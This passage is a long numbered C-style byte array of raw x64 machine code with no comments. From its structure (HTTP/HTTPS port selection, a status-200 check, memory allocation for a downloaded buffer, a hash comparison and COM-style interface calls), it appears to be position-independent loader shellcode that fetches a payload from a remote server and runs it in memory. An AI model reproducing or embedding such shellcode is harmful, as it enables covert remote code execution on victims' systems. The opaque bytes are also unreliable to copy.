101 0xc7, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85,
102 0x74, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x78, 0x02,
103 0x00, 0x00, 0x00, 0x02, 0x60, 0x84, 0x48, 0x8d, 0x85, 0xc0, 0x01, 0x00,
104 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
105 0x48, 0x89, 0xc1, 0xe8, 0xa4, 0x34, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x01,
106 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00,
107 0x00, 0x48, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0,
108 0x48, 0x89, 0x85, 0x08, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x01, 0x00,
109 0x00, 0x00, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x00,
110 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
111 0x80, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00,
112 0x48, 0x8d, 0x8a, 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01,
113 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba,
114 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00,
115 0x00, 0x00, 0x00, 0xe9, 0x5a, 0x04, 0x00, 0x00, 0x8b, 0x85, 0xd4, 0x01,
116 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89,
117 0x85, 0x74, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00,
118 0x74, 0x0a, 0x81, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x00, 0x30, 0x80, 0x00,
119 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd0, 0x00,
120 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
121 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00,
122 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
123 0x85, 0x68, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x68, 0x02, 0x00, 0x00,
124 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe9, 0x03, 0x00,
125 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd8,
126 0x00, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, 0x74, 0x08,
127 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xb8, 0x50, 0x00,
128 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
129 0x68, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
130 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
131 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
132 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
133 0x85, 0x60, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x02, 0x00, 0x00,
134 0x00, 0x0f, 0x84, 0xb1, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
135 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
136 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x92, 0x10, 0x06, 0x00, 0x00, 0x4c,
137 0x8d, 0x45, 0xc0, 0x48, 0x8b, 0x8d, 0x60, 0x02, 0x00, 0x00, 0x48, 0xc7,
138 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x78, 0x02, 0x00,
139 0x00, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
140 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
141 0xb9, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xd2, 0xff, 0xd0, 0x48, 0x89,
142 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x58, 0x02, 0x00, 0x00,
143 0x00, 0x0f, 0x84, 0x2b, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00,
144 0x00, 0x00, 0x74, 0x4f, 0x8b, 0x85, 0x78, 0x02, 0x00, 0x00, 0x25, 0x00,
145 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x40, 0xc7, 0x85, 0x54, 0x02, 0x00,
146 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x02, 0x00, 0x00, 0x80,
147 0x33, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
148 0x80, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x3c, 0x02, 0x00, 0x00,
149 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
150 0x00, 0x49, 0x89, 0xd0, 0xba, 0x1f, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
151 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x01, 0x00,
152 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
153 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
154 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
155 0xc0, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00,
156 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00,
157 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
158 0x80, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x34, 0x02, 0x00, 0x00,
159 0x48, 0x8d, 0x95, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02,
160 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d,
161 0x89, 0xc1, 0x49, 0x89, 0xd0, 0xba, 0x13, 0x00, 0x00, 0x20, 0xff, 0xd0,
162 0x85, 0xc0, 0x0f, 0x84, 0x2c, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x30, 0x02,
163 0x00, 0x00, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x1b, 0x01, 0x00,
164 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48,
165 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x40, 0x07, 0x00,
166 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00,
167 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02,
168 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x40, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x95,
169 0x34, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x48,
170 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd1, 0xba,
171 0x05, 0x00, 0x00, 0x20, 0xff, 0xd0, 0x85, 0xc0, 0x0f, 0x84, 0xba, 0x00,
172 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
173 0x40, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
174 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
175 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07,
176 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
177 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
178 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x89, 0x90, 0x48, 0x07,
179 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
180 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x53, 0xc7, 0x85, 0x38,
181 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
182 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
183 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x41,
184 0x89, 0xd2, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92,
185 0x48, 0x07, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x38, 0x02, 0x00, 0x00, 0x48,
186 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x45, 0x89, 0xd0,
187 0xff, 0xd0, 0x89, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
188 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b,
189 0x95, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
190 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00,
191 0x48, 0x8b, 0x95, 0x60, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
192 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00,
193 0x00, 0x00, 0x48, 0x8b, 0x95, 0x68, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1,
194 0xff, 0xd0, 0x83, 0xbd, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x99,
195 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
196 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x48, 0x02, 0x00, 0x00,
197 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x80, 0x40, 0x07,
198 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90,
199 0x30, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48,
200 0x05, 0x20, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x48, 0x02, 0x00, 0x00,
201 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x35,
202 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
203 0x28, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
204 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xca, 0x31, 0x00, 0x00, 0x48,
205 0x89, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, 0x02, 0x00,
206 0x00, 0x48, 0x8b, 0x80, 0x08, 0x19, 0x00, 0x00, 0x48, 0x3b, 0x85, 0x40,
207 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x06,
208 0x8b, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x00, 0x03, 0x00,
209 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48,
210 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xf4, 0x00, 0x00,
211 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
212 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x10,
213 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89,
214 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x48,
215 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48,
216 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xf7,
217 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x18, 0x01,
218 0x00, 0x00, 0x4c, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81,
219 0xc2, 0x2c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
220 0x1c, 0x04, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
221 0x00, 0x0f, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48,
222 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x55,
223 0x18, 0x4c, 0x8d, 0x4a, 0x08, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
224 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x4c, 0x8d, 0x52, 0x04,
225 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x0a, 0x4c, 0x89, 0xd2, 0xff, 0xd0,
226 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x6c, 0x48, 0x8b, 0x45,
227 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50,
228 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x48, 0x8d, 0x55, 0xc4,
229 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x5f, 0x8b,
230 0x45, 0xc4, 0x85, 0xc0, 0x74, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
231 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55,
232 0x18, 0x4c, 0x8d, 0x4a, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
233 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x92, 0x4c,
234 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c,
235 0x89, 0xd2, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0xeb, 0x19, 0x48, 0x8b, 0x45,
236 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0b, 0x48,
237 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d,
238 0xf4, 0x00, 0x79, 0x43, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x10,
239 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x83, 0xc2, 0x10, 0x48,
240 0x8b, 0x4d, 0x10, 0x4c, 0x8d, 0x81, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b,
241 0x4d, 0x10, 0x48, 0x81, 0xc1, 0x4c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54,
242 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00,
243 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
244 0x7d, 0xf4, 0x00, 0x79, 0x16, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
245 0x10, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x02,
246 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
247 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b,
248 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
249 0xf4, 0x00, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
250 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x48,
251 0x81, 0xc2, 0x04, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
252 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
253 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
254 0x42, 0x18, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x10, 0x48, 0x8b,
255 0x55, 0xe0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff,
256 0xd0, 0x89, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xb8,
257 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0,
258 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b,
259 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00,
260 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, 0x42, 0x20, 0x48, 0x8b, 0x55, 0x10,
261 0x4c, 0x8d, 0x8a, 0x6c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
262 0x8b, 0x4a, 0x18, 0x4c, 0x89, 0xca, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
263 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x2d, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xcc,
264 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10,
265 0x19, 0x00, 0x00, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
266 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc8, 0x49, 0x89, 0xd0,
267 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0,
268 0x48, 0x89, 0x45, 0xd8, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x0f, 0x84, 0xeb,
269 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
270 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x20,
271 0x8b, 0x55, 0xf0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48,
272 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19,
273 0x00, 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48,
274 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39,
275 0xc2, 0x72, 0xcd, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
276 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
277 0x18, 0x4c, 0x8d, 0x42, 0x28, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a,
278 0x20, 0x48, 0x8b, 0x55, 0xd8, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
279 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xec, 0xc7,
280 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b,
281 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x2f, 0x8b, 0x55, 0xf0, 0x48,
282 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8b, 0x55, 0xf8, 0x8b,
283 0x45, 0xf0, 0xc6, 0x84, 0x02, 0x18, 0x19, 0x00, 0x00, 0x00, 0x48, 0x8b,
284 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, 0x00,
285 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, 0x8b,
286 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, 0xc2,
287 0x72, 0xbe, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
288 0x00, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x8b, 0x45,
289 0xec, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
290 0x48, 0x01, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
291 0x48, 0x89, 0x8d, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0xe8, 0x00,
292 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
293 0x00, 0x48, 0xc7, 0x85, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
294 0x48, 0xc7, 0x45, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x18,
295 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00,
296 0x66, 0xc7, 0x45, 0xea, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
297 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
298 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
299 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
300 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
301 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00,
302 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x1f, 0x03, 0x00,
303 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28,
304 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
305 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x38, 0x48, 0x8b, 0x95,
306 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x4c, 0x89, 0xc2, 0xff,
307 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
308 0x00, 0x00, 0x0f, 0x88, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
309 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b,
310 0x80, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
311 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8d, 0x95, 0x88, 0x00, 0x00, 0x00, 0xff,
312 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
313 0x00, 0x00, 0x0f, 0x88, 0x49, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
314 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b,
315 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0,
316 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
317 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa8,
318 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d,
319 0x55, 0xe4, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0,
320 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x8b, 0x45, 0xe0,
321 0x29, 0xc2, 0x89, 0xd0, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x94, 0x00, 0x00,
322 0x00, 0x83, 0xbd, 0x94, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x79, 0x01,
323 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
324 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
325 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
326 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00,
327 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00,
328 0x00, 0x00, 0x66, 0xc7, 0x45, 0x30, 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0,
329 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b,
330 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, 0x41,
